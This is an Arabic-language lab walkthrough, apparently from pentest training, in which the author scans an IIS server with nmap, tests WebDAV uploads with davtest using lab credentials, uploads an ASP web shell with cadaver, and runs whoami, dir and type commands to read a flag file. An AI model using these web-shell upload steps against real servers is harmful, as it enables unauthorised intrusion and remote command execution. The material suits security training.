🧪 المختبر 4: استغلال WebDAV على خادم Microsoft IIS

🎯 الهدف الأساسي: تنفيذ الأوامر عن بعد (RCE) على خادم Microsoft IIS WebDAV من خلال رفع ملف ويب شيل باستخدام davtest و cadaver، واسترداد العلم (Flag).

🔧 الأدوات المستخدمة: nmap, davtest, cadaver, firefox.

  • cadaver: أداة سطر أوامر شبيهة بـ FTP لتفاعل مع خوادم WebDAV، مما يسمح بتحميل وتنزيل الملفات.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، تقييم الثغرات، الاستغلال

  1. الفحص واكتشاف خدمة WebDAV:

    • قم بإجراء فحص Nmap على الهدف لتحديد المنافذ المفتوحة والخدمات.

    • الأمر:

      nmap -sV x.0.x.0
    • الشرح: المنفذ 80 مفتوح و خادم ويب.

    • استخدم سكريبت Nmap http-enum لتحديد ما إذا كان WebDAV على خادم IIS.

    • الأمر:

      nmap --script http-enum -sV -p 80 x.0.x.0
    • الشرح: إذا نفذت هذا الأمر، ستظهر لك نتائج تشير إلى أن دليل /webdav/ موجود وقد يكون مثيراً للاهتمام مع إرجاع خطأ 401 Unauthorized. لن لازم المصادقة

  2. تقييم الثغرات (اختبار رفع الملفات باستخدام davtest):

    • استخدم davtest لاختبار قدرة خادم WebDAV على رفع الملفات وتحديد الامتدادات المسموح بها.

    • الأمر:

      davtest --url http://x.0.x.0/webdav/ -auth bob:password_123321
    • الشرح:ستلاحظ أن الملفات مثل .txt و .asp و .html يتم رفعها بنجاح.

  3. الاستغلال (رفع الويب شيل وتنفيذ الأوامر):

    • استخدم cadaver لرفع ويب شيل بصيغة .asp (مثل cmd.asp) إلى دليل WebDAV. ويب شيلز جاهزة في /usr/share/webshells/asp/.

    • الأمر:

      cadaver http://x.0.x.0/webdav/
    • الشرح: إذا نفذت هذا الأمر، بيطلب منك cadaver اسم المستخدم وكلمة المرور (Bob:password_123321) بعد المصادقة، ستدخل إلى واجهة cadaver.

    • الأمر: (داخل واجهة cadaver)

      put /usr/share/webshells/asp/cmd.asp
    • الشرح: رفع ملف الويب شيل cmd.asp إلى الخادم.

    • الوصول إلى الويب شيل وتنفيذ الأوامر: افتح متصفح الويب وانتقل إلى الويب شيل الذي تم رفعه.

    • الأمر الأساسي:

      http://x.0.x.0/webdav/cmd.asp
    • الشرح: بتشوف في الصفحة شيل الي يتيح وتنفيذ الأوامر عن بعد.

    • الأمر: (في حقل الأوامر على الويب شيل)

      whoami
    • الشرح: إذا نفذت هذا الأمر، ستعرض لك الصفحة اسم المستخدم الحالي (مثلاً iis apppool\defaultapppool).

    • الأمر: (في حقل الأوامر على الويب شيل)

      dir C:\
    • الشرح: إذا نفذت هذا الأمر، ستظهر لك محتويات القرص C:\، وستلاحظ وجود ملف flag.txt.

    • الأمر: (في حقل الأوامر على الويب شيل)

      type C:\flag.txt
    • الشرح: إذا نفذت هذا الأمر، ستعرض لك الصفحة محتويات ملف flag.txt.

Last updated